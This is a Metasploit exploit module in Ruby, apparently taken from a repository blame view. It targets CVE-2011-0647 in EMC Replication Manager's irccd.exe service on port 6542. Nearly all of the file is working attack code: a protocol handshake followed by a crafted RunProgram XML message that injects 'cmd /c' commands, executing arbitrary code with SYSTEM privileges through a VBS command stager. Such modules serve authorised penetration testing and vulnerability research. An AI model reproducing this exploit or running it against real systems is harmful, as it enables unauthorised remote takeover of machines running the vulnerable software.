2013-10-17 14:51:34 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
include Msf::Exploit::CmdStagerVBS
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'EMC Replication Manager Command Execution',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a remote command-injection vulnerability in EMC Replication
|
|
|
|
Manager client (irccd.exe). By sending a specially crafted message invoking RunProgram
|
|
|
|
function an attacker may be able to execute arbitrary code commands with SYSTEM privileges.
|
|
|
|
Affected products is EMC Replication Manager < 5.3.
|
|
|
|
This module has been successfully tested against EMC Replication Manager 5.2.1 on XP/W2003.
|
|
|
|
EMC Networker Module for Microsoft Applications 2.1 and 2.2 may be vulnerable too although
|
|
|
|
this module have not been tested against these products.
|
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Unknown', #Initial discovery
|
|
|
|
'Davy Douhine', #MSF module
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2011-0647' ],
|
|
|
|
[ 'OSVDB', '70853' ],
|
|
|
|
[ 'BID', '46235' ],
|
|
|
|
[ 'URL', 'http://www.securityfocus.com/archive/1/516260' ],
|
|
|
|
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-061/' ],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Feb 07 2011',
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Arch' => [ ARCH_X86 ],
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Automatic', { } ]
|
|
|
|
],
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
'Privileged' => true,
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(6542),
|
|
|
|
OptString.new('CMD', [ false, 'Execute this command instead of using command stager']),
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
|
|
|
if datastore['CMD']
|
|
|
|
print_status("Executing command '#{datastore['CMD']}'")
|
|
|
|
execute_command(datastore['CMD'], {})
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
execute_cmdstager({:linemax => 5000})
|
|
|
|
handler
|
|
|
|
end
|
|
|
|
|
|
|
|
def execute_command(cmd, opts)
|
|
|
|
connect
|
|
|
|
hello = "1HELLOEMC00000000000000000000000"
|
|
|
|
sock.put(hello)
|
|
|
|
result = sock.get_once || ''
|
|
|
|
if result =~ /RAWHELLO/
|
|
|
|
print_good("We sent hello and get hello back from the server. Good")
|
|
|
|
else
|
|
|
|
disconnect
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
startsession = "EMC_Len0000000136<?xml version=\"1.0\" encoding=\"UTF-8\"?><ir_message ir_sessionId=0000 ir_type=\"ClientStartSession\" <ir_version>1</ir_version></ir_message>"
|
|
|
|
sock.put(startsession)
|
|
|
|
result = sock.get_once || ''
|
|
|
|
if result =~ /EMC/
|
|
|
|
print_good("A session has been created. Good.")
|
|
|
|
else
|
|
|
|
disconnect
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
runprog = "<?xml version=\"1.0\" encoding=\"UTF-8\"?> "
|
|
|
|
runprog << "<ir_message ir_sessionId=\"01111\" ir_requestId=\"00000\" ir_type=\"RunProgram\" ir_status=\"0\"><ir_runProgramCommand>cmd /c #{cmd}</ir_runProgramCommand>"
|
|
|
|
runprog << "<ir_runProgramAppInfo><?xml version="1.0" encoding="UTF-8"?> <ir_message ir_sessionId="00000" ir_requestId="00000" "
|
|
|
|
runprog << "ir_type="App Info" ir_status="0"><IR_groupEntry IR_groupType="anywriter" IR_groupName="CM1109A1" IR_groupId="1" "
|
|
|
|
runprog << ">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;? &gt; &lt;ir_message ir_sessionId=&quot;00000&quot; "
|
|
|
|
runprog << "ir_requestId=&quot;00000&quot;ir_type=&quot;App Info&quot; ir_status=&quot;0&quot;&gt;&lt;aa_anywriter_ccr_node&gt;CM1109A1"
|
|
|
|
runprog << "&lt;/aa_anywriter_ccr_node&gt;&lt;aa_anywriter_fail_1018&gt;0&lt;/aa_anywriter_fail_1018&gt;&lt;aa_anywriter_fail_1019&gt;0"
|
|
|
|
runprog << "&lt;/aa_anywriter_fail_1019&gt;&lt;aa_anywriter_fail_1022&gt;0&lt;/aa_anywriter_fail_1022&gt;&lt;aa_anywriter_runeseutil&gt;1"
|
|
|
|
runprog << "&lt;/aa_anywriter_runeseutil&gt;&lt;aa_anywriter_ccr_role&gt;2&lt;/aa_anywriter_ccr_role&gt;&lt;aa_anywriter_prescript&gt;"
|
|
|
|
runprog << "&lt;/aa_anywriter_prescript&gt;&lt;aa_anywriter_postscript&gt;&lt;/aa_anywriter_postscript&gt;&lt;aa_anywriter_backuptype&gt;1"
|
|
|
|
runprog << "&lt;/aa_anywriter_backuptype&gt;&lt;aa_anywriter_fail_447&gt;0&lt;/aa_anywriter_fail_447&gt;&lt;aa_anywriter_fail_448&gt;0"
|
|
|
|
runprog << "&lt;/aa_anywriter_fail_448&gt;&lt;aa_exchange_ignore_all&gt;0&lt;/aa_exchange_ignore_all&gt;&lt;aa_anywriter_sthread_eseutil&gt;0&"
|
|
|
|
runprog << ";lt;/aa_anywriter_sthread_eseutil&gt;&lt;aa_anywriter_required_logs&gt;0&lt;/aa_anywriter_required_logs&gt;&lt;aa_anywriter_required_logs_path"
|
|
|
|
runprog << "&gt;&lt;/aa_anywriter_required_logs_path&gt;&lt;aa_anywriter_throttle&gt;1&lt;/aa_anywriter_throttle&gt;&lt;aa_anywriter_throttle_ios&gt;300"
|
|
|
|
runprog << "&lt;/aa_anywriter_throttle_ios&gt;&lt;aa_anywriter_throttle_dur&gt;1000&lt;/aa_anywriter_throttle_dur&gt;&lt;aa_backup_username&gt;"
|
|
|
|
runprog << "&lt;/aa_backup_username&gt;&lt;aa_backup_password&gt;&lt;/aa_backup_password&gt;&lt;aa_exchange_checksince&gt;1335208339"
|
|
|
|
runprog << "&lt;/aa_exchange_checksince&gt; &lt;/ir_message&gt;</IR_groupEntry> </ir_message></ir_runProgramAppInfo>"
|
|
|
|
runprog << "<ir_applicationType>anywriter</ir_applicationType><ir_runProgramType>backup</ir_runProgramType> </ir_message>"
|
|
|
|
emc6 = "EMC_Len000000";
|
|
|
|
runpacket = emc6 + runprog.length.to_s + runprog
|
|
|
|
sock.put(runpacket)
|
|
|
|
Rex.sleep(1) # wait for irccd.exe to write the stager on disk
|
|
|
|
endstring = Rex::Text.rand_text_alpha(rand(10)+32)
|
2013-10-17 15:10:05 +00:00
|
|
|
sock.put(endstring)
|
2013-10-17 14:51:34 +00:00
|
|
|
disconnect
|
|
|
|
|
|
|
|
end
|
|
|
|
end
|